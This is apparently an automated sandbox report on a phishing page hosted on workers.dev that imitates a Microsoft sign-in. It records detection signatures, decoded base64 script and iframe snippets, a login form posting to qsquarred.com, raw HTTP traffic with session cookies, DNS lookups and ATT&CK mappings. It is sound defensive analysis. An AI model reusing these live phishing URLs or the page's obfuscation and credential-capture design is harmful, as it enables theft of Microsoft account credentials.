Windows Analysis Report
https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDP

Overview

General Information

Sample URL: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDP
Analysis ID: 1650392

Detection

HTMLPhisher
Score: 60
Range: 0 - 100
Confidence: 100%

Signatures

AI detected phishing page
Yara detected HtmlPhish54
AI detected suspicious Javascript
Creates files inside the system directory
Deletes files inside the Windows folder
Form action URLs do not match main URL
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML page contains obfuscated script src

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 1064 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 5024 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,14553789535348024310,2542120593596377207,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2112 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 6620 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDP" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
Source | Rule | Description | Author | Strings
0.5..script.csv | JoeSecurity_HtmlPhish_54 | Yara detected HtmlPhish_54 | Joe Security |
0.5.pages.csv | JoeSecurity_HtmlPhish_54 | Yara detected HtmlPhish_54 | Joe Security |
      No Sigma rule has matched
      No Suricata rule has matched

      Phishing

      Source: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDP Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The URL '248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev' does not match the legitimate domain 'microsoft.com'., The domain 'workers.dev' is a generic domain often used for cloud services, which can be legitimate but is not directly associated with Microsoft., The subdomain and path appear to be random strings, which is a common tactic in phishing URLs to obscure the true nature of the site., The presence of input fields for 'Email, phone, or Skype' is typical for phishing attempts targeting Microsoft accounts. DOM: 0.6.pages.csv
      Source: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDP Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The URL '248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev' does not match the legitimate domain 'microsoft.com'., The domain 'workers.dev' is a generic domain often used for cloud services, which can be legitimate but is not directly associated with Microsoft., The subdomain and path structure appear random and do not convey any direct association with Microsoft., The presence of input fields for 'Email, phone, or Skype' is typical for Microsoft services, but the URL does not support legitimacy., The URL contains no direct reference to Microsoft, which is suspicious. DOM: 0.5.pages.csv
      Source: Yara match File source: 0.5..script.csv, type: HTML
      Source: Yara match File source: 0.5.pages.csv, type: HTML
      Source: 0.3..script.csv Joe Sandbox AI: Detected suspicious JavaScript with source url: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.... This script demonstrates high-risk behavior by using the `atob()` function to decode a base64-encoded string that contains an HTML snippet. The decoded HTML includes an `iframe` element that loads content from an external domain (`qsquarred.com`), which is a potential indicator of malicious activity such as phishing or drive-by downloads. The use of obfuscated code and the inclusion of an external iframe are strong indicators of suspicious and potentially harmful behavior, warranting a high-risk score.
      Source: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDP HTTP Parser: Form action: https://qsquarred.com/common/login workers qsquarred
      Source: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDP HTTP Parser: Number of links: 0
      Source: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDP HTTP Parser: Base64 decoded: <!doctype html><html><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"></head><body style="margin:0;padding:0"><iframe src="https://qsquarred.com/?sign=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczov...
      Source: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDP HTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX
      Source: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDP HTTP Parser: Iframe src: https://portal.microsoftonline.com/Prefetch/Prefetch.aspx
      Source: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDP HTTP Parser: <input type="password" .../> found
      Source: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDP HTTP Parser: No favicon
      Source: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDP HTTP Parser: No <meta name="author".. found
      Source: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDP HTTP Parser: No <meta name="copyright".. found
      Source: chrome.exe Memory has grown: Private usage: 9MB later: 40MB
      Source: global trafficHTTP traffic detected: GET /Prefetch/Prefetch.aspx HTTP/1.1Host: portal.microsoftonline.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://qsquarred.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /aadcdn.msftauth.net/~/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1Host: qsquarred.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://qsquarred.com/index.html//?uuq_tgnqcf=vtwgAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=FYkJ8F4TTrkT; qPdM.sig=5iLODd9RthlxLH7D-f1dZIMjvvc; buid=1.AQ8AqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAPAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQElCjVFG8U-dxQHQ3J0JlY0vcoN9OM24GriTruVEXNu6vOIlXCvf2OwQxLJBQkz9onYUUfwXUugFTVChaa5T3LTTTQMNYcUjIHCu0Xbs09PZ4gAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE58Dy3shl5dC-ht9vvXz8mqCNdrS_yYwTDyMTOs9jIAUBeJ6q9lCoRgRcd17ZhEE_XAxuI27K4NWqoiGwXJE8rYFQkFizMwvsBxATDyNsuVNBvv98E92Aqn0LnQT9hcaBNJ7od8eOT1MlkW7yyt1iM_wSXuwTy-x5ZvkSB8q8yUYgAA; esctx-kczYCLPbBOY=AQABCQEAAABVrSpeuWamRam2jAF1XRQE00M5NVJEAe2d_IjGsOZuLCgCxdXfKqoMHj1ef_kVPBFqcBHuNO3Q4aUOUsEUY4R8lT1jHT-9-9fnm1QXvFnNjFteq7SMElAmM0qhp-F5F6RAW4sBHzBDRYE1C8SN3R7T1J6R0fnUsm1BKrZ17Mdn4yAA; fpc=Ag7JDEp-NZ5HrrX0nOibxdO4vjNwAQAAAD1vd98OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; ak_bmsc=9B848C52FE8198453A00964537BEFB1E~000000000000000000000000000000~YAAQ72jJF6CxHtWVAQAAr7dd2Bs1+Syq+oMC//S3WBxG+1l3dy/eS7GWUfF3PT7Axso3T3ilWmS43APmbSNXFdys1k/gWp5Oau9ZuHtq3XD3TQXQh9jAUYNiFkV0Jr+STi2ekVJXdqLeGotXSvsQoMXZp1gUlA/liTWsX1tvFKXsid1nyAcvTGv/J2cgSNkOfG6bZVdHNaVG1U3uEBWn9ziv3owtSnnMyR12SwVNStsATn14hR7inI39OzSyprnZGUYzXBIF5Y0ZtWJSISSMlxsaUo2GU4tniMToO+iTY66NlatD3Qk8UMRdtbP7joM7zwHqYFKBZM+XrvGkP8NQmcwcNOyjLr2ehxsB; brcap=0
      Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_80e93b9a4cb13643afca.js HTTP/1.1Host: qsquarred.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://qsquarred.com/index.html//?uuq_tgnqcf=vtwgAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=FYkJ8F4TTrkT; qPdM.sig=5iLODd9RthlxLH7D-f1dZIMjvvc; buid=1.AQ8AqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAPAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQElCjVFG8U-dxQHQ3J0JlY0vcoN9OM24GriTruVEXNu6vOIlXCvf2OwQxLJBQkz9onYUUfwXUugFTVChaa5T3LTTTQMNYcUjIHCu0Xbs09PZ4gAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE58Dy3shl5dC-ht9vvXz8mqCNdrS_yYwTDyMTOs9jIAUBeJ6q9lCoRgRcd17ZhEE_XAxuI27K4NWqoiGwXJE8rYFQkFizMwvsBxATDyNsuVNBvv98E92Aqn0LnQT9hcaBNJ7od8eOT1MlkW7yyt1iM_wSXuwTy-x5ZvkSB8q8yUYgAA; esctx-kczYCLPbBOY=AQABCQEAAABVrSpeuWamRam2jAF1XRQE00M5NVJEAe2d_IjGsOZuLCgCxdXfKqoMHj1ef_kVPBFqcBHuNO3Q4aUOUsEUY4R8lT1jHT-9-9fnm1QXvFnNjFteq7SMElAmM0qhp-F5F6RAW4sBHzBDRYE1C8SN3R7T1J6R0fnUsm1BKrZ17Mdn4yAA; fpc=Ag7JDEp-NZ5HrrX0nOibxdO4vjNwAQAAAD1vd98OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; ak_bmsc=9B848C52FE8198453A00964537BEFB1E~000000000000000000000000000000~YAAQ72jJF6CxHtWVAQAAr7dd2Bs1+Syq+oMC//S3WBxG+1l3dy/eS7GWUfF3PT7Axso3T3ilWmS43APmbSNXFdys1k/gWp5Oau9ZuHtq3XD3TQXQh9jAUYNiFkV0Jr+STi2ekVJXdqLeGotXSvsQoMXZp1gUlA/liTWsX1tvFKXsid1nyAcvTGv/J2cgSNkOfG6bZVdHNaVG1U3uEBWn9ziv3owtSnnMyR12SwVNStsATn14hR7inI39OzSyprnZGUYzXBIF5Y0ZtWJSISSMlxsaUo2GU4tniMToO+iTY66NlatD3Qk8UMRdtbP7joM7zwHqYFKBZM+XrvGkP8NQmcwcNOyjLr2ehxsB; brcap=0
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.devConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDPAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /aadcdn.msftauth.net/~/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: qsquarred.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=FYkJ8F4TTrkT; qPdM.sig=5iLODd9RthlxLH7D-f1dZIMjvvc; buid=1.AQ8AqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAPAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQElCjVFG8U-dxQHQ3J0JlY0vcoN9OM24GriTruVEXNu6vOIlXCvf2OwQxLJBQkz9onYUUfwXUugFTVChaa5T3LTTTQMNYcUjIHCu0Xbs09PZ4gAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE58Dy3shl5dC-ht9vvXz8mqCNdrS_yYwTDyMTOs9jIAUBeJ6q9lCoRgRcd17ZhEE_XAxuI27K4NWqoiGwXJE8rYFQkFizMwvsBxATDyNsuVNBvv98E92Aqn0LnQT9hcaBNJ7od8eOT1MlkW7yyt1iM_wSXuwTy-x5ZvkSB8q8yUYgAA; esctx-kczYCLPbBOY=AQABCQEAAABVrSpeuWamRam2jAF1XRQE00M5NVJEAe2d_IjGsOZuLCgCxdXfKqoMHj1ef_kVPBFqcBHuNO3Q4aUOUsEUY4R8lT1jHT-9-9fnm1QXvFnNjFteq7SMElAmM0qhp-F5F6RAW4sBHzBDRYE1C8SN3R7T1J6R0fnUsm1BKrZ17Mdn4yAA; fpc=Ag7JDEp-NZ5HrrX0nOibxdO4vjNwAQAAAD1vd98OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; ak_bmsc=9B848C52FE8198453A00964537BEFB1E~000000000000000000000000000000~YAAQ72jJF6CxHtWVAQAAr7dd2Bs1+Syq+oMC//S3WBxG+1l3dy/eS7GWUfF3PT7Axso3T3ilWmS43APmbSNXFdys1k/gWp5Oau9ZuHtq3XD3TQXQh9jAUYNiFkV0Jr+STi2ekVJXdqLeGotXSvsQoMXZp1gUlA/liTWsX1tvFKXsid1nyAcvTGv/J2cgSNkOfG6bZVdHNaVG1U3uEBWn9ziv3owtSnnMyR12SwVNStsATn14hR7inI39OzSyprnZGUYzXBIF5Y0ZtWJSISSMlxsaUo2GU4tniMToO+iTY66NlatD3Qk8UMRdtbP7joM7zwHqYFKBZM+XrvGkP8NQmcwcNOyjLr2ehxsB; brcap=0
      Source: global trafficHTTP traffic detected: GET /aadcdn.msftauth.net/~/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: qsquarred.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=FYkJ8F4TTrkT; qPdM.sig=5iLODd9RthlxLH7D-f1dZIMjvvc; buid=1.AQ8AqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAPAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQElCjVFG8U-dxQHQ3J0JlY0vcoN9OM24GriTruVEXNu6vOIlXCvf2OwQxLJBQkz9onYUUfwXUugFTVChaa5T3LTTTQMNYcUjIHCu0Xbs09PZ4gAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE58Dy3shl5dC-ht9vvXz8mqCNdrS_yYwTDyMTOs9jIAUBeJ6q9lCoRgRcd17ZhEE_XAxuI27K4NWqoiGwXJE8rYFQkFizMwvsBxATDyNsuVNBvv98E92Aqn0LnQT9hcaBNJ7od8eOT1MlkW7yyt1iM_wSXuwTy-x5ZvkSB8q8yUYgAA; esctx-kczYCLPbBOY=AQABCQEAAABVrSpeuWamRam2jAF1XRQE00M5NVJEAe2d_IjGsOZuLCgCxdXfKqoMHj1ef_kVPBFqcBHuNO3Q4aUOUsEUY4R8lT1jHT-9-9fnm1QXvFnNjFteq7SMElAmM0qhp-F5F6RAW4sBHzBDRYE1C8SN3R7T1J6R0fnUsm1BKrZ17Mdn4yAA; fpc=Ag7JDEp-NZ5HrrX0nOibxdO4vjNwAQAAAD1vd98OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; ak_bmsc=9B848C52FE8198453A00964537BEFB1E~000000000000000000000000000000~YAAQ72jJF6CxHtWVAQAAr7dd2Bs1+Syq+oMC//S3WBxG+1l3dy/eS7GWUfF3PT7Axso3T3ilWmS43APmbSNXFdys1k/gWp5Oau9ZuHtq3XD3TQXQh9jAUYNiFkV0Jr+STi2ekVJXdqLeGotXSvsQoMXZp1gUlA/liTWsX1tvFKXsid1nyAcvTGv/J2cgSNkOfG6bZVdHNaVG1U3uEBWn9ziv3owtSnnMyR12SwVNStsATn14hR7inI39OzSyprnZGUYzXBIF5Y0ZtWJSISSMlxsaUo2GU4tniMToO+iTY66NlatD3Qk8UMRdtbP7joM7zwHqYFKBZM+XrvGkP8NQmcwcNOyjLr2ehxsB; brcap=0
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global traffic - DNS traffic detected: DNS query: 248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev
      Source: global traffic - DNS traffic detected: DNS query: cdn.jsdelivr.net
      Source: global traffic - DNS traffic detected: DNS query: challenges.cloudflare.com
      Source: global traffic - DNS traffic detected: DNS query: www.google.com
      Source: global traffic - DNS traffic detected: DNS query: qsquarred.com
      Source: global traffic - DNS traffic detected: DNS query: aadcdn.msftauth.net
      Source: global traffic - DNS traffic detected: DNS query: identity.nel.measure.office.net
      Source: global traffic - DNS traffic detected: DNS query: portal.microsoftonline.com
      Source: C:\Program Files\Google\Chrome\Application\chrome.exe - File created: C:\Windows\SystemTemp\scoped_dir1064_1872937132
      Source: C:\Program Files\Google\Chrome\Application\chrome.exe - File deleted: C:\Windows\SystemTemp\scoped_dir1064_1872937132
      Source: classification engine - Classification label: mal60.phis.win@26/16@24/182
      Source: unknown - Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exe - Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,14553789535348024310,2542120593596377207,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2112 /prefetch:3
      Source: unknown - Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDP"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exe - Process created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exe - Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,14553789535348024310,2542120593596377207,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2112 /prefetch:3
      Source: Window Recorder Window detected: More than 3 window changes detected
      Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names
      Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server
      Initial Access: 1 Drive-by Compromise; Default Accounts; Domain Accounts; Local Accounts
      Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron
      Persistence: 1 Browser Extensions; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook
      Privilege Escalation: 1 Process Injection; 1 Extra Window Memory Injection; Logon Script (Windows); Login Hook
      Defense Evasion: 1 Masquerading; 1 Process Injection; 1 File Deletion; 1 Extra Window Memory Injection
      Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
      Discovery: System Service Discovery; Application Window Discovery; Query Registry; System Network Configuration Discovery
      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
      Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
      Command and Control: 1 Encrypted Channel; 4 Non-Application Layer Protocol; 5 Application Layer Protocol; 3 Ingress Tool Transfer
      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication
      Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction

      SourceDetectionScannerLabelLink
      https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDP0%Avira URL Cloudsafe
      No Antivirus matches
                                              IP
                                              192.168.2.16
                                              Joe Sandbox version:42.0.0 Malachite
                                              Analysis ID:1650392
                                              Start date and time:2025-03-27 17:08:31 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                              Sample URL:https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDP
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:16
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • EGA enabled
                                              Analysis Mode:stream
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal60.phis.win@26/16@24/182
                                              • Exclude process from analysis (whitelisted): svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 142.250.80.35, 142.251.35.174, 172.253.122.84, 142.250.81.238
                                              • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                              • Not all processes were analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtOpenFile calls found.
                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • VT rate limit hit for: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDP
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:HTML document, ASCII text, with very long lines (829), with no line terminators
                                              Category:downloaded
                                              Size (bytes):829
                                              Entropy (8bit):5.708933285874252
                                              Encrypted:false
                                              SSDEEP:
                                              MD5:37BB8C2AA86276EBF216336A308F7B7F
                                              SHA1:DCC599521B915DB3FFAEEAB4D2FCA2AABEC754DD
                                              SHA-256:396336F9F70F75B5645D232BBB36910CDF4FCAA04F1454051B48CCA92FD6474B
                                              SHA-512:66703CCFCC56DF475043C1FB8EC9ABBBA36DBF2F03BCA1D392C46B509E303ACF87A09B30E3E0C03D2A0845CA41B191DB2199A00EEAC5A2577CEE08FFD3E4D495
                                              Malicious:false
                                              Reputation:unknown
                                              URL:https://qsquarred.com/aadcdn.msftauth.net/~/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_80e93b9a4cb13643afca.js
                                              Preview:<!DOCTYPE html><html><head><script src="data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX0pKTtkb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuc3R5bGUuZmlsdGVyPSJodWUtcm90YXRlKDRkZWcpIjtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImciXX0pKTtzZXRUaW1lb3V0KGMsMWUzKX19YygpOwo="></script><title>WebContentNotFound</title></head><body><h1>The requested content does not exist.</h1><p><ul><li>HttpStatusCode: 404</li><li>ErrorCode: WebContentNotFound</li><li>RequestId : d5199a57-b01e-0000-7b32-9fca2c000000</li><li>TimeStamp : 2025-03-27T16:05:32.9915322Z</li></ul></p></body></html>
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:HTML document, ASCII text, with very long lines (802), with no line terminators
                                              Category:downloaded
                                              Size (bytes):802
                                              Entropy (8bit):5.830283770247898
                                              Encrypted:false
                                              SSDEEP:
                                              MD5:04A07F43E2B1D094C17023D66099A85F
                                              SHA1:2CCDF89BCBD6A78F7162269A40BE661D34E506C5
                                              SHA-256:D5B8C13E535708C6229F08EC39B3A4997AB27823B42339342756025BAF935B0A
                                              SHA-512:88B9A9027BC15D6EF48C4B963666D33D1A7B2A3214F5F30A711E065CC65919D4B0D3C608ACF23526FB3B1281571533F60E87BC6024E7AFB2D2205C47CF42EDE4
                                              Malicious:false
                                              Reputation:unknown
                                              URL:https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDP
